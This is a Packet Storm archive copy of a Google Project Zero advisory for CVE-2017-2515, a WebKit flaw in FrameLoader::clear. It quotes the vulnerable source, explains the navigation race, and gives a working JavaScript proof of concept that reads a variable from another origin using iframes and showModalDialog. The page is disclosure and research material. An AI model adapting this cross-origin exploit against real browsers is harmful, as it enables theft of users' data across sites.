what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WebKit FrameLoader::clear Variable Theft

WebKit FrameLoader::clear Variable Theft
Posted May 25, 2017
Authored by Google Security Research, lokihardt

WebKit suffers from a variable theft issue in FrameLoader::clear via page navigation.

tags | exploit
advisories | CVE-2017-2515
SHA-256 | b2f1425e0cc7f6da7a5294cfe11ef3cbea388ebea94dcf08b5676216e6615267

WebKit FrameLoader::clear Variable Theft

Change Mirror Download
 WebKit: Stealing variables via page navigation in FrameLoader::clear 

CVE-2017-2515


void FrameLoader::clear(Document* newDocument, bool clearWindowProperties, bool clearScriptObjects, bool clearFrameView)
{
m_frame.editor().clear();

if (!m_needsClear)
return;
m_needsClear = false;

if (m_frame.document()->pageCacheState() != Document::InPageCache) {
...
m_frame.document()->prepareForDestruction(); <<-------- (a)
if (hadLivingRenderTree)
m_frame.document()->removeFocusedNodeOfSubtree(*m_frame.document());
}
...
m_frame.setDocument(nullptr); <<------- (b)
...
if (clearWindowProperties)
m_frame.script().setDOMWindowForWindowShell(newDocument->domWindow()); <<------- (c)
...
}

FrameLoader::clear is called when page navigation is made and it does:
1. clear the old document at (b).
2. attach the new window object at (c).

If a new page navigation is made at (a), the new window will not attached due to |m_needsClear| check. As a result, the new document's script will be execute on the old window object.

PoC will reproduce to steal |secret_key| value from another origin(data:text/html,...).

PoC:
<body>
Click anywhere.
<script>
function createURL(data, type = 'text/html') {
return URL.createObjectURL(new Blob([data], {type: type}));
}

window.onclick = () => {
window.onclick = null;

let f = document.body.appendChild(document.createElement('iframe'));
f.contentDocument.open();
f.contentDocument.onreadystatechange = () => {
f.contentDocument.onreadystatechange = null;

let g = f.contentDocument.appendChild(document.createElement('iframe'));
g.contentDocument.open();
g.contentDocument.onreadystatechange = () => {
g.contentDocument.onreadystatechange = null;

f.contentWindow.__defineGetter__('navigator', function () {
return {};
});

let a = f.contentDocument.createElement('a');
a.href = 'data:text/html,' + encodeURI(`<script>var secret_key = '23412341234';</scrip` + 't>');
a.click();

showModalDialog(createURL(`
<script>
let it = setInterval(() => {
try {
opener[0].frameElement.contentDocument.x;
} catch (e) {
clearInterval(it);
window.close();
}
}, 100);
</scrip` + 't>'));

alert('secret_key:' + f.contentWindow.secret_key);
//showModalDialog('about:blank');
};
};

f.src = 'javascript:""';
}

</script>
</body>


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close